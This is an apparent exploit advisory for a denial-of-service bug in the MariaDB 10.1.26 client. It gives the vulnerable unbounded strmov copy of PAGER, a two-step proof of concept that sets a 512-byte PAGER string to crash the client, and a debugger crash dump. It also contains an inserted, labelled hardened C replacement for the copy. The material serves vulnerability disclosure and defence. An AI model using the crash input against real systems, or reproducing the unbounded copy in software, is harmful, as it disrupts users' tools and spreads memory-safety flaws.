MariaDB Client 10.1.26 - Denial of Service (PoC)
Source: vfocus.net  Author: strider  Published: 2018-11-27
# Exploit Title: MariaDB Client 10.1.26 - Denial of Service (PoC)
# Google Dork: None
# Date: 2018-11-16
# Exploit Author: strider
# Software Link: https://github.com/MariaDB/server
# Version: mysql  Ver 15.1 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
# Tested on: Debian 9 Stretch x64 / Ubuntu 18.04 x86_64
# CVE : None
 
# Description:
# The MariaDB client reads its configuration from environment variables. The PAGER variable is vulnerable to a buffer overflow:
# if the value of PAGER is 512 characters or longer, the client crashes and becomes unusable.
 
# The cause is the function strmov, which copies the entire source string into a destination
# buffer of fixed size (default_pager, FN_REFLEN bytes) without checking the length.
 
Codepart:
static char default_pager[FN_REFLEN];
 
char *tmp=getenv("PAGER");
if (tmp && strlen(tmp))
{
    default_pager_set= 1;
    strmov(default_pager, tmp);
}
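The block above copies getenv("PAGER") without any bound. Below is an added example (not code from the MariaDB project or from the advisory author) showing the hardened shape of that block: a length check before the copy, rejecting an oversize value instead of silently truncating it, plus a helper that reports how many bytes the original strmov would write past the buffer. FN_REFLEN is assumed to be 512 here to match the 512-byte value in the advisory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* FN_REFLEN is MariaDB's fixed path-buffer size; 512 is assumed here to match the
 * 512-byte PAGER value in the advisory (this file is a standalone model, not mysql.cc). */
#define FN_REFLEN 512

static char default_pager[FN_REFLEN];
static int  default_pager_set = 0;

const char *get_default_pager(void)    { return default_pager; }
int         is_default_pager_set(void) { return default_pager_set; }

/* Bytes the original unbounded strmov() would write past the end of default_pager
 * (the terminating NUL included); 0 means the copy fits. */
size_t pager_overflow_bytes(const char *tmp)
{
    size_t needed = strlen(tmp) + 1;
    return needed > sizeof(default_pager) ? needed - sizeof(default_pager) : 0;
}

/* Hardened replacement for the advisory's block: copy only if the value fits, and
 * refuse it otherwise (truncating could launch a different program than intended).
 * Returns 1 if a pager was set, 0 if PAGER is unset or empty, -1 if it was rejected. */
int set_default_pager(const char *tmp)
{
    if (tmp == NULL || *tmp == '\0')
        return 0;
    size_t len = strlen(tmp);
    if (len >= sizeof(default_pager)) {
        fprintf(stderr, "PAGER value is %zu bytes; max %zu, ignoring\n",
                len, sizeof(default_pager) - 1);
        return -1;
    }
    memcpy(default_pager, tmp, len + 1);   /* len + 1 includes the NUL; bounded above */
    default_pager_set = 1;
    return 1;
}

int main(void)
{
    /* Read PAGER from the real environment, as the client does. */
    int rc = set_default_pager(getenv("PAGER"));
    printf("rc=%d set=%d pager=\"%s\"\n", rc, is_default_pager_set(), get_default_pager());
    return rc < 0 ? 1 : 0;
}
```

Run it with the PAGER value from Step 1 of the PoC exported and it reports the rejection and exits non-zero instead of crashing.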
 
 
Proof of Concept:
 
Step 1:
 
export PAGER=$(python -c "print '\x41' * 512")
 
Step 2:
 
mariadb -u user -p
 
Crash
 
---------------------------------------------------------------------
peda output:
 
Program received signal SIGSEGV, Segmentation fault.
 
[----------------------------------registers-----------------------------------]
RAX: 0x555555b73600 ('A' <repeats 200 times>...)
RBX: 0x555555b7cbc8 ('A' <repeats 200 times>...)
RCX: 0x70 ('p')
RDX: 0x0
RSI: 0x555555bafe40 ('A' <repeats 200 times>...)
RDI: 0x555555bb0040
RBP: 0x7fffffffdfa0 --> 0x555555639a80 (<__libc_csu_init>: push   r15)
RSP: 0x7fffffffdd48 --> 0x55555558e5bc (<main+620>:    mov    rax,QWORD PTR [r12])
RIP: 0x7ffff677e2e6 (<__strcpy_sse2_unaligned+374>:   movdqu XMMWORD PTR [rdi-0x40],xmm4)
R8 : 0x555555b92580 ('A' <repeats 200 times>...)
R9 : 0x20 (' ')
R10: 0x7fffffffa5a0 --> 0x7fffffffa5d0 --> 0x7fffffffdb80 --> 0x7fffffffdc10 --> 0x0
R11: 0x7ffff6846d68 --> 0xfff37778fff37768
R12: 0x555555b00bc0 --> 0x555555b00b80 --> 0x40000000 ('')
R13: 0x7ffff6a846e8 --> 0x7ffff6a84600 --> 0xfbad2084
R14: 0x0
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
 